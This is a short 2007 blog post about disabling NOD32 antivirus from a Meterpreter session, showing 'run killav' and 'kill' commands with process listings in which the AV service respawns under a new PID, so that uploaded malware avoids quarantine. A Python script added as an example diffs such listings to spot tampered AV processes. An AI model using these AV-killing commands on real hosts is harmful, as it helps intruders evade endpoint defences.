Saturday, June 16, 2007

Antivirus and Rootkits part 2 -nod32


More on killing AV...

McAfee Enterprise 8.x was kicking my butt with the killav script, so I decided to try NOD32 version 2.7. It didn't go much better. It would at least kill the processes, but nod32krn.exe would just start back up automatically with a new PID :-(

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32krn.exe...
[*] Killing off nod32kui.exe...
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3040 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 3040
Killing: 3040
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3244 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

So it kills the GUI, but it's still running in the background, happily snatching up any malware you might be trying to upload. The user won't get the pop-up, but it will be sticking the malware back into quarantine. That's no good.
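As an added example (not from the post or from the Metasploit killav script), here is a small Python helper that diffs two `ps` listings in the "PID Name Path" format shown above and flags a watched process that vanished or came back under a new PID, which is the tamper signal a defender would want to alert on; the watched process names and the two sample listings are constructed for this example.

```python
"""Diff two meterpreter-style `ps` listings ("PID Name Path" rows) and
classify watched AV processes: stable, restarted (new PID), gone, started,
or absent. Detection-side helper; sample data below is constructed."""
import re
from collections import defaultdict

# Rows look like "3040 nod32krn.exe C:\Program Files\Eset\nod32krn.exe";
# the path may contain spaces, so it is captured greedily at the end.
LINE_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*)$")

# Image names to watch; this set is an assumption for the example.
AV_NAMES = {"nod32krn.exe", "nod32kui.exe"}


def parse_ps(text):
    """Return {image_name: set(PIDs)} for every data row in a listing.
    Header lines ("PID Name Path", "--- ---- ----") do not start with a
    number, so the regex skips them."""
    procs = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs[m.group(2).lower()].add(int(m.group(1)))
    return dict(procs)


def diff_av(before, after, watch=AV_NAMES):
    """Classify each watched image between two snapshots."""
    b, a = parse_ps(before), parse_ps(after)
    verdict = {}
    for name in sorted(watch):
        if name not in b and name not in a:
            verdict[name] = "absent"
        elif name in b and name not in a:
            verdict[name] = "gone"        # killed and not respawned
        elif name not in b and name in a:
            verdict[name] = "started"
        elif b[name] == a[name]:
            verdict[name] = "stable"
        else:
            verdict[name] = "restarted"   # same image, different PID(s)
    return verdict


# Constructed snapshots modelled on the post's output (nod32kui PID made up).
BEFORE = r"""PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
3040 nod32krn.exe C:\Program Files\Eset\nod32krn.exe
3052 nod32kui.exe C:\Program Files\Eset\nod32kui.exe
"""
AFTER = r"""PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
3244 nod32krn.exe C:\Program Files\Eset\nod32krn.exe
"""
```

Running `diff_av(BEFORE, AFTER)` on these snapshots reports nod32krn.exe as restarted and nod32kui.exe as gone, the same pattern the two `ps` listings above show.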

I'm now doing some research on changing some registry keys, but it pretty much involves rebooting the box and coming back to finish up, which isn't a viable option in my opinion.

I'll post more on it later.

-CG